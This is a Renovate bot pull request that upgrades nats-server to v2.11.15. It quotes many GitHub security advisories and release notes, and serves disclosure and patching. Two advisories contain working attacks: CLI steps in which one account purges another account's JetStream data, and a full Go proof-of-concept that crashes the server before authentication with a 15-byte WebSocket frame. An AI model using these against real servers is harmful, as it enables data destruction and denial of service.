Skip to content

test: update module github.com/nats-io/nats-server/v2 to v2.11.15 [security]#76

Open
renovate[bot] wants to merge 1 commit intomainfrom
renovate/go-github.com-nats-io-nats-server-v2-vulnerability
Open

test: update module github.com/nats-io/nats-server/v2 to v2.11.15 [security]#76
renovate[bot] wants to merge 1 commit intomainfrom
renovate/go-github.com-nats-io-nats-server-v2-vulnerability

Conversation

@renovate
Copy link
Copy Markdown
Contributor

@renovate renovate Bot commented Apr 15, 2025
edited
Loading

ℹ️ Note

This PR body was truncated due to platform limits.

This PR contains the following updates:

Package Change Age Confidence
github.com/nats-io/nats-server/v2 v2.10.17v2.11.15 age confidence

NATS Server may fail to authorize certain Jetstream admin APIs

CVE-2025-30215 / GHSA-fhg8-qxh5-7q3w

More information

Details

Advisory

The management of JetStream assets happens with messages in the $JS. subject namespace in the system account; this is partially exposed into regular accounts to allow account holders to manage their assets.

Some of the JS API requests were missing access controls, allowing any user with JS management permissions in any account to perform certain administrative actions on any JS asset in any other account. At least one of the unprotected APIs allows for data destruction. None of the affected APIs allow disclosing stream contents.

Affected versions

NATS Server:

  • Version 2 from v2.2.0 onwards, prior to v2.11.1 or v2.10.27
Original Report

(Lightly edited to confirm some supposition and in the summary to use past tense)

Summary

nats-server did not include authorization checks on 4 separate admin-level JetStream APIs: account purge, server remove, account stream move, and account stream cancel-move.

In all cases, APIs are not properly restricted to system-account users. Instead, any authorized user can execute the APIs, including across account boundaries, as long as the current user merely has permission to publish on $JS.>.

Only the first seems to be of highest severity. All are included in this single report as they seem likely to have the same underlying root cause.

Reproduction of the ACCOUNT.PURGE case is below. The others are like it.

Details & Impact
Issue 1: $JS.API.ACCOUNT.PURGE.*

Any user may perform an account purge of any other account (including their own).

Risk: total destruction of Jetstream configuration and data.

Issue 2: $JS.API.SERVER.REMOVE

Any user may remove servers from Jetstream clusters.

Risk: Loss of data redundancy, reduction of service quality.

Issue 3: $JS.API.ACCOUNT.STREAM.MOVE.*.* and CANCEL_MOVE

Any user may cause streams to be moved between servers.

Risk: loss of control of data provenance, reduced service quality during move, enumeration of account and/or stream names.

Similarly for $JS.API.ACCOUNT.STREAM.CANCEL_MOVE.*.*

Mitigations

It appears that users without permission to publish on $JS.API.ACCOUNT.> or $JS.API.SERVER.> are unable to execute the above APIs.

Unfortunately, in many configurations, an 'admin' user for a single account will be given permissions for $JS.> (or simply >), which allows the improper access to the system APIs above.

Scope of impact

Issues 1 and 3 both cross boundaries between accounts, violating promised account isolation. All 3 allow system level access to non-system account users.

While I cannot speak to what authz configurations are actually found in the wild, per the discussion in Mitigations above, it seems likely that at least some configurations are vulnerable.

Additional notes

It appears that $JS.API.META.LEADER.STEPDOWN does properly restrict to system account users. As such, this may be a pattern for how to properly authorize these other APIs.

PoC
Environment

Tested with:
nats-server 2.10.26 (installed via homebrew)
nats cli 0.1.6 (installed via homebrew)
macOS 13.7.4

Reproduction steps
$ nats-server --version
nats-server: v2.10.26

$ nats --version
0.1.6

$ cat nats-server.conf
listen: '0.0.0.0:4233'
jetstream: {
  store_dir: './tmp'
}
accounts: {
  '$SYS': {
    users: [{user: 'sys', password: 'sys'}]
  },
  'TEST': {
    jetstream: true,
    users: [{user: 'a', password: 'a'}]
  },
  'TEST2': {
    jetstream: true,
    users: [{user: 'b', password: 'b'}]
  }
}

$ nats-server -c ./nats-server.conf
...
[90608] 2025/03/02 11:43:18.494663 [INF] Using configuration file: ./nats-server.conf
...
[90608] 2025/03/02 11:43:18.496395 [INF] Listening for client connections on 0.0.0.0:4233
...

##### Authentication is effectively enabled by the server:
$ nats -s nats://localhost:4233 account info
nats: error: setup failed: nats: Authorization Violation

$ nats -s nats://localhost:4233 account info --user sys --password wrong
nats: error: setup failed: nats: Authorization Violation

$ nats -s nats://localhost:4233 account info --user a --password wrong
nats: error: setup failed: nats: Authorization Violation

$ nats -s nats://localhost:4233 account info --user b --password wrong
nats: error: setup failed: nats: Authorization Violation

##### Valid credentials work, and users properly matched to accounts:
$ nats -s nats://localhost:4233 account info --user sys --password sys
Account Information
                      User: sys
                   Account: $SYS
...

$ nats -s nats://localhost:4233 account info --user a --password a
Account Information
                           User: a
                        Account: TEST
...

$ nats -s nats://localhost:4233 account info --user b --password b
Account Information
                           User: b
                        Account: TEST2
...

##### Add a stream and messages to account TEST (user 'a'):
$ nats -s nats://localhost:4233 --user a --password a stream add stream1 --subjects s1 --storage file --defaults
Stream stream1 was created
...

$ nats -s nats://localhost:4233 --user a --password a publish s1 --count 3 "msg "
11:50:05 Published 5 bytes to "s1"
11:50:05 Published 5 bytes to "s1"
11:50:05 Published 5 bytes to "s1"

##### Messages are correctly persisted on account TEST, and not on TEST2:
$ nats -s nats://localhost:4233 --user a --password a stream ls
╭───────────────────────────────────────────────────────────────────────────────╮
│                                    Streams                                    │
├─────────┬─────────────┬─────────────────────┬──────────┬───────┬──────────────┤
│ Name    │ Description │ Created             │ Messages │ Size  │ Last Message │
├─────────┼─────────────┼─────────────────────┼──────────┼───────┼──────────────┤
│ stream1 │             │ 2025-03-02 11:48:49 │ 3        │ 111 B │ 46.01s       │
╰─────────┴─────────────┴─────────────────────┴──────────┴───────┴──────────────╯

$ nats -s nats://localhost:4233 --user b --password b stream ls
No Streams defined

$ du -h tmp/jetstream
  0B	tmp/jetstream/TEST/streams/stream1/obs
8.0K	tmp/jetstream/TEST/streams/stream1/msgs
 16K	tmp/jetstream/TEST/streams/stream1
 16K	tmp/jetstream/TEST/streams
 16K	tmp/jetstream/TEST
 16K	tmp/jetstream

##### User b (account TEST2) sends a PURGE command for account TEST (user a).

##### According to the source comments, user b shouldn't even be able to purge it's own account, much less another one.
$ nats -s nats://localhost:4233 --user b --password b request '$JS.API.ACCOUNT.PURGE.TEST' ''
11:54:50 Sending request on "$JS.API.ACCOUNT.PURGE.TEST"
11:54:50 Received with rtt 1.528042ms
{"type":"io.nats.jetstream.api.v1.account_purge_response","initiated":true}

##### From nats-server in response to the purge request:
[90608] 2025/03/02 11:54:50.277144 [INF] Purge request for account TEST (streams: 1, hasAccount: true)

##### And indeed, the stream data is gone on account TEST:
$ du -h tmp/jetstream
  0B	tmp/jetstream

$ nats -s nats://localhost:4233 --user a --password a stream ls
No Streams defined

Severity

  • CVSS Score: 9.6 / 10 (Critical)
  • Vector String: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:H/A:H

References

This data is provided by the GitHub Advisory Database (CC-BY 4.0).

nats-server websockets are vulnerable to pre-auth memory DoS

CVE-2026-27571 / GHSA-qrvq-68c2-7grw

More information

Details

Impact

The WebSockets handling of NATS messages handles compressed messages via the WebSockets negotiated compression. The implementation bound the memory size of a NATS message but did not independently bound the memory consumption of the memory stream when constructing a NATS message which might then fail validation for size reasons.

An attacker can use a compression bomb to cause excessive memory consumption, often resulting in the operating system terminating the server process.

The use of compression is negotiated before authentication, so this does not require valid NATS credentials to exploit.

The fix was to bounds the decompression to fail once the message was too large, instead of continuing on.

Patches

This was released in nats-server without being highlighted as a security issue. It should have been, this was an oversight. Per the NATS security policy, because this does not require a valid user, it is CVE-worthy.

This was fixed in the v2.11 series with v2.11.12 and in the v2.12 series with v2.12.3.

Workarounds

This only affects deployments which use WebSockets and which expose the network port to untrusted end-points.

References

This was reported to the NATS maintainers by Pavel Kohout of Aisle Research (www.aisle.com).

Severity

  • CVSS Score: 5.9 / 10 (Medium)
  • Vector String: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H

References

This data is provided by the GitHub Advisory Database (CC-BY 4.0).

NATS credentials are exposed in monitoring port via command-line argv

CVE-2026-33247 / GHSA-x6g4-f6q3-fqvv

More information

Details

Background

NATS.io is a high performance open source pub-sub distributed communication technology, built for the cloud, on-premise, IoT, and edge computing.

The nats-server provides an optional monitoring port, which provides access to sensitive data. The nats-server can take certain configuration options on the command-line instead of requiring a configuration file.

Problem Description

If a nats-server is run with static credentials for all clients provided via argv (the command-line), then those credentials are visible to any user who can see the monitoring port, if that too is enabled.

The /debug/vars end-point contains an unredacted copy of argv.

Patches

Fixed in nats-server 2.12.6 & 2.11.15

Workarounds

The NATS Maintainers are bemused at the concept of someone deploying a real configuration using --pass to avoid a config file, but also enabling monitoring.

Configure credentials inside a configuration file instead of via argv.

Do not enable the monitoring port if using secrets in argv.

Best practice remains to not expose the monitoring port to the Internet, or to untrusted network sources.

Severity

  • CVSS Score: 7.4 / 10 (High)
  • Vector String: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N

References

This data is provided by the GitHub Advisory Database (CC-BY 4.0).

NATS Server panic via malicious compression on leafnode port

CVE-2026-29785 / GHSA-52jh-2xxh-pwh6

More information

Details

Background

NATS.io is a high performance open source pub-sub distributed communication technology, built for the cloud, on-premise, IoT, and edge computing.

When configured to accept leafnode connections (for a hub/spoke topology of multiple nats-servers), then the default configuration allows for negotiating compression; a malicious remote NATS server can trigger a server panic via that compression.

Problem Description

If the nats-server has the "leafnode" configuration enabled (not default), then anyone who can connect can crash the nats-server by triggering a panic. This happens pre-authentication and requires that compression be enabled (which it is, by default, when leafnodes are used).

Context: a NATS server can form various clustering topologies, including local clusters, and superclusters of clusters, but leafnodes allow for separate administrative domains to link together with limited data communication; eg, a server in a moving vehicle might use a local leafnode for agents to connect to, and sync up to a central service as and when available. The leafnode configuration here is where the central server allows other NATS servers to connect into it, almost like regular NATS clients. Documentation examples typically use port 7422 for leafnode communications.

Affected Versions

Version 2, prior to v2.11.14 or v2.12.5

Workarounds

Disable compression on the leafnode port:

leafnodes {
  port: 7422
  compression: off
}

Severity

  • CVSS Score: 7.5 / 10 (High)
  • Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

References

This data is provided by the GitHub Advisory Database (CC-BY 4.0).

NATS is vulnerable to MQTT hijacking via Client ID

CVE-2026-33215 / GHSA-fcjp-h8cc-6879

More information

Details

Background

NATS.io is a high performance open source pub-sub distributed communication technology, built for the cloud, on-premise, IoT, and edge computing.

The nats-server provides an MQTT client interface.

Problem Description

Sessions and Messages can by hijacked via MQTT Client ID malfeasance.

Affected Versions

Any version before v2.12.6 or v2.11.15

Workarounds

None.

Resources

Severity

  • CVSS Score: 6.5 / 10 (Medium)
  • Vector String: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:L

References

This data is provided by the GitHub Advisory Database (CC-BY 4.0).

NATS has MQTT plaintext password disclosure

CVE-2026-33216 / GHSA-v722-jcv5-w7mc

More information

Details

Background

NATS.io is a high performance open source pub-sub distributed communication technology, built for the cloud, on-premise, IoT, and edge computing.

The nats-server provides an MQTT client interface.

Problem Description

For MQTT deployments using usercodes/passwords: MQTT passwords are incorrectly classified as a non-authenticating identity statement (JWT) and exposed via monitoring endpoints.

Affected Versions

Any version before v2.12.6 or v2.11.15

Workarounds

Ensure monitoring end-points are adequately secured.

Best practice remains to not expose the monitoring endpoint to the Internet or other untrusted network users.

Severity

  • CVSS Score: 8.6 / 10 (High)
  • Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N

References

This data is provided by the GitHub Advisory Database (CC-BY 4.0).

NATS allows MQTT clients to bypass ACL checks

CVE-2026-33217 / GHSA-jxxm-27vp-c3m5

More information

Details

Background

NATS.io is a high performance open source pub-sub distributed communication technology, built for the cloud, on-premise, IoT, and edge computing.

The nats-server provides an MQTT client interface.

Problem Description

When using ACLs on message subjects, these ACLs were not applied in the $MQTT.> namespace, allowing MQTT clients to bypass ACL checks for MQTT subjects.

Affected Versions

Any version before v2.12.6 or v2.11.15

Workarounds

None.

Severity

  • CVSS Score: 7.1 / 10 (High)
  • Vector String: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N

References

This data is provided by the GitHub Advisory Database (CC-BY 4.0).

NATS has pre-auth server panic via leafnode handling

CVE-2026-33218 / GHSA-vprv-35vv-q339

More information

Details

Background

NATS.io is a high performance open source pub-sub distributed communication technology, built for the cloud, on-premise, IoT, and edge computing.

The nats-server allows hub/spoke topologies using "leafnode" connections by other nats-servers.

Problem Description

A client which can connect to the leafnode port can crash the nats-server with a certain malformed message pre-authentication.

Affected Versions

Any version before v2.12.6 or v2.11.15

Workarounds
  1. Disable leafnode support if not needed.
  2. Restrict network connections to your leafnode port, if plausible without compromising the service offered.
References

Severity

  • CVSS Score: 7.5 / 10 (High)
  • Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

References

This data is provided by the GitHub Advisory Database (CC-BY 4.0).

NATS is vulnerable to pre-auth DoS through WebSockets client service

CVE-2026-33219 / GHSA-8r68-gvr4-jh7j

More information

Details

Background

NATS.io is a high performance open source pub-sub distributed communication technology, built for the cloud, on-premise, IoT, and edge computing.

The nats-server offers a WebSockets client service, used in deployments where browsers are the NATS clients.

Problem Description

A malicious client which can connect to the WebSockets port can cause unbounded memory use in the nats-server before authentication; this requires sending a corresponding amount of data.

This is a milder variant of NATS-advisory-ID 2026-02 (aka CVE-2026-27571; GHSA-qrvq-68c2-7grw).
That earlier issue was a compression bomb, this vulnerability is not. Attacks against this new issue thus require significant client bandwidth.

Affected Versions

Any version before v2.12.6 or v2.11.15

Workarounds

Disable websockets if not required for project deployment.

Severity

  • CVSS Score: 5.3 / 10 (Medium)
  • Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

References

This data is provided by the GitHub Advisory Database (CC-BY 4.0).

NATS JetStream has an authorization bypass through its Management API

CVE-2026-33222 / GHSA-9983-vrx2-fg9c

More information

Details

Background

NATS.io is a high performance open source pub-sub distributed communication technology, built for the cloud, on-premise, IoT, and edge computing.

The persistent storage feature, JetStream, has a management API which has many features, amongst which are backup and restore.

Problem Description

Users with JetStream admin API access to restore one stream could restore to other stream names, impacting data which should have been protected against them.

Affected Versions

Any version before v2.12.6 or v2.11.15

Workarounds

If developers have configured users to have limited JetStream restore permissions, temporarily remove those permissions.

Severity

  • CVSS Score: 4.9 / 10 (Medium)
  • Vector String: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:N

References

This data is provided by the GitHub Advisory Database (CC-BY 4.0).

NATS Server: Incomplete Stripping of Nats-Request-Info Header Allows Identity Spoofing

CVE-2026-33223 / GHSA-pwx7-fx9r-hr4h

More information

Details

Background

NATS.io is a high performance open source pub-sub distributed communication technology, built for the cloud, on-premise, IoT, and edge computing.

The nats-server offers a Nats-Request-Info: message header, providing information about a request.

Problem Description

The NATS message header Nats-Request-Info: is supposed to be a guarantee of identity by the NATS server, but the stripping of this header from inbound messages was not fully effective.

An attacker with valid credentials for any regular client interface could thus spoof their identity to services which rely upon this header.

Affected Versions

Any version before v2.12.6 or v2.11.15

Workarounds

None.

Severity

  • CVSS Score: 6.4 / 10 (Medium)
  • Vector String: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N

References

This data is provided by the GitHub Advisory Database (CC-BY 4.0).

NATS: Leafnode connections allow spoofing of Nats-Request-Info identity headers

CVE-2026-33246 / GHSA-55h8-8g96-x4hj

More information

Details

Background

NATS.io is a high performance open source pub-sub distributed communication technology, built for the cloud, on-premise, IoT, and edge computing.

The nats-server allows hub/spoke topologies using "leafnode" connections by other nats-servers. NATS messages can have headers.

Problem Description

The nats-server offers a Nats-Request-Info: message header, providing information about a request. This is supposed to provide enough information to allow for account/user identification, such that NATS clients could make their own decisions on how to trust a message, provided that they trust the nats-server as a broker.

A leafnode connecting to a nats-server is not fully trusted unless the system account is bridged too. Thus identity claims should not have propagated unchecked.

Thus NATS clients relying upon the Nats-Request-Info: header could be spoofed.

Does not directly affect the nats-server itself, but the CVSS Confidentiality and Integrity scores are based upon what a hypothetical client might choose to do with this NATS header.

Affected Versions

Any version before v2.12.6 or v2.11.15

Workarounds

None.

Severity

  • CVSS Score: 6.4 / 10 (Medium)
  • Vector String: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N

References

This data is provided by the GitHub Advisory Database (CC-BY 4.0).

NATS has mTLS verify_and_map authentication bypass via incorrect Subject DN matching

CVE-2026-33248 / GHSA-3f24-pcvm-5jqc

More information

Details

Background

NATS.io is a high performance open source pub-sub distributed communication technology, built for the cloud, on-premise, IoT, and edge computing.

One authentication model supported is mTLS, deriving the NATS client identity from properties of the TLS Client Certificate.

Problem Description

When using mTLS for client identity, with verify_and_map to derive a NATS identity from the client certificate's Subject DN, certain patterns of RDN would not be correctly enforced, allowing for authentication bypass.

This does require a valid certificate from a CA already trusted for client certificates, and DN naming patterns which the NATS maintainers consider highly unlikely.

So this is an unlikely attack. Nonetheless, administrators who have been very sophisticated in their DN construction patterns might conceivably be impacted.

Affected Versions

Fixed in nats-server 2.12.6 & 2.11.15

Workarounds

Developers should review their CA issuing practices.

Severity

  • CVSS Score: 4.2 / 10 (Medium)
  • Vector String: CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:N

References

This data is provided by the GitHub Advisory Database (CC-BY 4.0).

NATS: Pre-auth remote server crash via WebSocket frame length overflow in wsRead

CVE-2026-27889 / GHSA-pq2q-rcw4-3hr6

More information

Details

Background

NATS.io is a high performance open source pub-sub distributed communication technology, built for the cloud, on-premise, IoT, and edge computing.

When using WebSockets, a malicious client can trigger a server crash with crafted frames, before authentication.

Problem Description

A missing sanity check on a WebSockets frame could trigger a server panic in the nats-server. This happens before authentication, and so is exposed to anyone who can connect to the websockets port.

Affected versions

Version 2 from v2.2.0 onwards, prior to v2.11.14 or v2.12.5

Workarounds

This only affects deployments which use WebSockets and which expose the network port to untrusted end-points. If able to do so, a defense in depth of restricting either of these will mitigate the attack.

Solution

Upgrade the NATS server to a fixed version.

Credits

This was reported to the NATS maintainers by GitHub user Mistz1.
Also independently reported by GitHub user jiayuqi7813.

Report by @​Mistz1
Summary

An unauthenticated remote attacker can crash the entire nats-server process by sending a single malicious WebSocket frame (15 bytes after the HTTP upgrade handshake). The server fails to validate the RFC 6455 §5.2 requirement that the most significant bit of a 64-bit extended payload length must be zero. The resulting uint64int conversion produces a negative value, which bypasses the bounds clamp and triggers an unrecovered panic in the connection's goroutine — killing the entire server process and disconnecting all clients. This affects all platforms (64-bit and 32-bit).

Details

Vulnerable code: server/websocket.go line 278

r.rem = int(binary.BigEndian.Uint64(tmpBuf))

When a WebSocket frame uses the 64-bit extended payload length (length code 127), the server reads 8 bytes and casts the raw uint64 directly to int with no validation. RFC 6455 §5.2 states: "the most significant bit MUST be 0" — but nats-server never checks this.

Attack chain:

  1. The attacker sends a WebSocket frame with the MSB set in the 64-bit length field (e.g., 0x8000000000000001).

  2. At line 278, int(0x8000000000000001) produces -9223372036854775807 on 64-bit Go (two's complement reinterpretation — Go does not panic on integer conversion overflow).

  3. r.rem is now negative. At line 307–311, the bounds clamp fails:

    n = r.rem                    // n = -9223372036854775807
if pos+n > max {             // 14 + (-huge) = negative, NOT > max → FALSE
    n = max - pos            // clamp NEVER fires
}
b = buf[pos : pos+n]         // buf[14 : -9223372036854775793] → PANIC

    The addition pos + n wraps to a negative value (Go signed integer overflow is defined behavior — it wraps silently). Since the negative result is never greater than max, the clamp is skipped. The slice expression at line 311 reaches the Go runtime bounds check, which panics.

  4. There is no defer recover() anywhere in the goroutine chain:

    The unrecovered panic propagates to Go's runtime, which calls os.Exit(2). The entire nats-server process terminates.

  5. The WebSocket frame is parsed in wsRead() called from readLoop(), which starts immediately after the HTTP upgrade — before any NATS CONNECT authentication. No credentials are required.

Why 15 bytes, not 14: The 14-byte frame header (opcode + length + mask key) exactly fills the read buffer on the first call, so pos == max and the payload loop at line 303 (if pos < max) is skipped. The poisoned r.rem persists in the wsReadInfo struct. One additional byte of "payload" is needed so that pos < max on either the same or next read, entering the panic path at line 311.

PoC

Server configuration (test-ws.conf):

listen: 127.0.0.1:4222

websocket {
    listen: "127.0.0.1:9222"
    no_tls: true
}

Start the server:

nats-server -c test-ws.conf

Exploit (poc_ws_crash.go):

package main

import (
	"bufio"
	"encoding/binary"
	"fmt"
	"net"
	"net/http"
	"os"
	"time"
)

func main() {
	target := "127.0.0.1:9222"
	if len(os.Args) > 1 {
		target = os.Args[1]
	}

	fmt.Printf("[*] Connecting to %s...\n", target)
	conn, err := net.DialTimeout("tcp", target, 5*time.Second)
	if err != nil {
		fmt.Printf("[-] Connection failed: %v\n", err)
		os.Exit(1)
	}
	defer conn.Close()

	// WebSocket upgrade
	req, _ := http.NewRequest("GET", "http://"+target, nil)
	req.Header.Set("Upgrade", "websocket")
	req.Header.Set("Connection", "Upgrade")
	req.Header.Set("Sec-WebSocket-Key", "dGhlIHNhbXBsZSBub25jZQ==")
	req.Header.Set("Sec-WebSocket-Version", "13")
	req.Header.Set("Sec-WebSocket-Protocol", "nats")
	req.Write(conn)

	conn.SetReadDeadline(time.Now().Add(5 * time.Second))
	resp, err := http.ReadResponse(bufio.NewReader(conn), req)
	if err != nil || resp.StatusCode != 101 {
		fmt.Printf("[-] Upgrade failed\n")
		os.Exit(1)
	}
	fmt.Println("[+] WebSocket established")
	conn.SetReadDeadline(time.Time{})

	// Malicious frame: FIN+Binary, MASK+127, 8-byte length with MSB set, mask key, 1 payload byte
	frame := make([]byte, 15)
	frame[0] = 0x82                                             // FIN + Binary
	frame[1] = 0xFF                                             // MASK + 127 (64-bit length)
	binary.BigEndian.PutUint64(frame[2:10], 0x8000000000000001) // MSB set
	frame[10] = 0xDE                                            // Mask key
	frame[11] = 0xAD
	frame[12] = 0xBE
	frame[13] = 0xEF
	frame[14] = 0x41                                            // 1 payload byte

	fmt.Printf("[*] Sending: %x\n", frame)
	conn.Write(frame)

	time.Sleep(2 * time.Second)

	// Verify crash
	conn2, err := net.DialTimeout("tcp", target, 3*time.Second)
	if err != nil {
		fmt.Println("[!!!] SERVER IS DOWN — full process crash confirmed")
		os.Exit(0)
	}
	conn2.Close()
	fmt.Println("[-] Server still running")
}

Run:

go build -o poc_ws_crash poc_ws_crash.go
./poc_ws_crash

Observed server output before termination:

panic: runtime error: slice bounds out of range [:-9223372036854775793]

goroutine 13 [running]:
github.com/nats-io/nats-server/v2/server.(*client).wsRead(...)
        server/websocket.go:311 +0xa93
github.com/nats-io/nats-server/v2/server.(*client).readLoop(...)
        server/client.go:1434 +0x768
github.com/nats-io/nats-server/v2/server.(*Server).startGoRoutine.func1()
        server/server.go:4078 +0x32

Tested against: nats-server v2.14.0-dev (commit a69f51f), Go 1.25.7, linux/amd64.

Impact

Vulnerability type: Pre-authentication remote denial of service (full process crash).

Who is impacted: Any nats-server deployment with WebSocket listeners enabled (websocket { ... } in config), including MQTT-over-WebSocket. This is an increasingly common configuration for browser-based and IoT clients. The attacker needs only TCP access to the WebSocket port — no credentials, no valid NATS client, no TLS client certificate.

Severity: A single unauthenticated TCP connection sending 15 bytes crashes the entire server process. All connected clients (NATS, WebSocket, MQTT, cluster routes, gateways, leaf nodes) are immediately disconnected. JetStream in-flight acknowledgments are lost and Raft consensus is disrupted in clustered deployments. The attack is repeatable on every server restart.

Affected platforms: All — confirmed on 64-bit (linux/amd64); 32-bit platforms (linux/386, linux/arm) are also affected with additional frame-desync consequences.

( NATS retains the original external report below the cut, with exploit details.
This issue was also independently reported by GitHub user @​jiayuqi7813 before publication; they provided a Python exploit.)

Severity

  • CVSS Score: 7.5 / 10 (High)
  • Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

References

This data is provided by the GitHub Advisory Database (CC-BY 4.0).

Release Notes

nats-io/nats-server (github.com/nats-io/nats-server/v2)

v2.11.15

Compare Source

Changelog

Refer to the 2.11 Upgrade Guide for backwards compatibility notes with 2.10.x.

Go Version
  • 1.25.8
Dependencies
  • golang.org/x/crypto v0.49.0 (#​7953)
  • github.com/nats-io/jwt/v2 v2.8.1 (#​7960)
  • github.com/antithesishq/antithesis-sdk-go v0.6.0-default-no-op
  • github.com/klauspost/compress v1.18.4
  • github.com/nats-io/nats.go v1.49.0
  • github.com/nats-io/nkeys v0.4.15
CVEs
Changed

General

  • There is now a 1MB size limit on JWTs (#​7960)
Improved

JetStream

  • The stream peer-remove command now accepts a peer ID as well as a server name (#​7952)

MQTT

  • Protocol compliance has been improved, including more error handling on invalid or malformed MQTT packets (#​7933)
Fixed

General

  • Improved handling of duplicate headers
  • A correctness bug when validating relative distinguished names has been fixed
  • Secrets are now redacted correctly in trace logging (#​7942)
  • The expvar endpoint on the monitoring port now correctly redacts secrets from the command line arguments
  • Trace headers are no longer incorrectly parsed when hitting max payload (#​7954)
  • The Nats-Trace-Dest message header for message tracing now requires that the client have publish permissions to the specified subject, an error is returned otherwise

JetStream

  • A panic when paginating on various JetStream API endpoints has been fixed
  • An interior path traversal bug that could occur when purging JetStream accounts has been fixed
  • Meta snapshot apply errors are now surfaced correctly so that the cluster monitor does not advance the applied index (#​7944)
  • Fixed an issue where extremely large JetStream reservations could overflow and violate tier limits
  • Stream restores now ensure that the stream name in the restore subject matches that of the restored snapshot archive
  • Stream ingest now correctly strips a NATS status header if present, avoiding incorrect classification of sourced or mirrored messages as control traffic
  • Stream sourcing now works correctly when sourcing into a stream with the Discard New Per Subject discard policy (#​7896)

Leafnodes

  • A panic when receiving a loop detection error before a connect message has been fixed
  • Messages from leafnodes to non-shared service imports now correctly rebuild the request info header
  • Leafnodes will now back off on receiving a minimum version required error, no longer requiring blocking the readloop (#​7970)

MQTT

  • SUB and UNSUB packets now correctly detect and reject the Packet Identifier being set to 0 (#​7805)
  • A panic that could occur when processing invalid fixed32 or fixed64 fields has been fixed (#​7941)
  • Persisted MQTT sessions can no longer be restored by a non-matching client ID
  • Restrict the implicit permissions for MQTT clients to $MQTT.sub. and $MQTT.deliver.pubrel. prefixes
  • MQTT password are no longer exposed in the JWT field of monitoring endpoints or advisory messages
  • NATS special characters (., >, *, spaces, tabs) are no longer permitted in MQTT client IDs
  • MQTT session flapping detection now uses monotonic time, fixing cases where it could be sensitive to NTP adjustments or clock drifts

WebSockets

  • WebSocket protocol parsing no longer relies on potentially unbounded in-memory allocations from compressed or uncompressed frames
Complete Changes

v2.11.14

Compare Source

Changelog

Refer to the 2.11 Upgrade Guide for backwards compatibility notes with 2.10.x.

Go Version
  • 1.25.8
Dependencies
CVEs
Fixed

Leafnodes

  • Receiving a leafnode subscription before negotiating compression should no longer result in a server panic

WebSockets

  • Fix invalid parsing of 64-bit payload lengths, which could lead to a server panic
  • Correctly reject compressed frames when compression was not negotiated as a part of the handshake
  • The Origin header validation now validates the protocol scheme as well as host and port
  • Gracefully handle failed connection upgrades
  • The CLOSE frame lengths and status codes are now validated correctly
  • The compressor state is correctly reset when a max payload error occurs
  • Empty compressed buffers should no longer result in a server panic
Complete Changes

v2.11.12

Compare Source

Changelog

Refer to the 2.11 Upgrade Guide for backwards compatibility notes with 2.10.x.

Go Version
Dependencies
  • github.com/nats-io/nkeys v0.4.12 (#​7578)
  • github.com/antithesishq/antithesis-sdk-go v0.5.0-default-no-op (#​7604)
  • github.com/klauspost/compress v1.18.3 (#​7736)
  • golang.org/x/crypto v0.47.0 (#​7736)
  • golang.org/x/sys v0.40.0 (#​7736)
  • github.com/google/go-tpm v0.9.8 (#​7696)
  • github.com/nats-io/nats.go v1.48.0 (#​7696)
Added

General

  • Added WebSocket-specific ping interval configuration with ping_internal in the websocket block (#​7614)

Monitoring

  • Added tls_cert_not_after to the varz monitoring endpoint for showing when TLS certificates are due to expire (#​7709)
Improved

JetStream

  • The scan for the last sourced message sequence when setting up a subject-filtered source is now considerably faster (#​7553)
  • Consumer interest checks on interest-based streams are now significantly faster when there are large gaps in interest (#​7656)
  • Creating consumer file stores no longer contends on the stream lock, improving consumer create performance on heavily loaded streams (#​7700)
  • Recalculating num pending with updated filter subjects no longer gathers and sorts the subject filter list twice (#​7772)
  • Switching to interest-based retention will now remove no-interest messages from the head of the stream (#​7766)

MQTT

  • Retained messages will now work correctly even when sourced from a different account and has a subject transform (#​7636)
Fixed

General

  • WebSocket connections will now correctly limit the buffer size during decompression (#​7625, thanks to Pavel Kokout at Aisle Research)
  • The config parser now correctly detects and errors on self-referencing environment variables (#​7737)
  • Internal functions for handling headers should no longer corrupt message bodies if appended (#​7752)

JetStream

  • A protocol error caused by an invalid transform of acknowledgement reply subjects when originating from a gateway connection has been fixed (#​7579)
  • The meta layer will now only respond to peer remove requests after quorum has been reached (#​7581)
  • Invalid subject filters containing non-terminating full wildcard no longer produce unexpected matches (#​7585)
  • A data race when creating a stream in clustered mode has been fixed (#​7586)
  • A panic when processing snapshots with missing nodes or assignments has been fixed (#​7588)
  • When purging whole message blocks, the subject tracking and scheduled messages are now updated correctly (#​7593)
  • The filestore will no longer unexpectedly lose writes when AsyncFlush is enabled after a process pause (#​7594)
  • The filestore now will process message removal on disk before updating accounting, which improves error handling (#​7595, #​7601)
  • Raft will no longer allow peer-removing the one remaining peer (#​7610)
  • A data race has been fixed in the stream health check (#​7619)
  • Tombstones are now correctly written for recovering the sequences after compacting or purging an almost-empty stream to seq 2 (#​7627)
  • Combining skip sequences and compactions will no longer overwrite the block at the wrong offset, correcting a corrupt record state error (#​7627)
  • Compactions that reclaim over half of the available space now use an atomic write to avoid losing messages if killed (#​7627)
  • Filestore compaction should no longer result in no idx present cache errors (#​7634)
  • Filestore compaction now corr

Note

PR body was truncated to here.

Configuration

📅 Schedule: (UTC)

  • Branch creation
    • ""
  • Automerge
    • At any time (no schedule defined)

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.

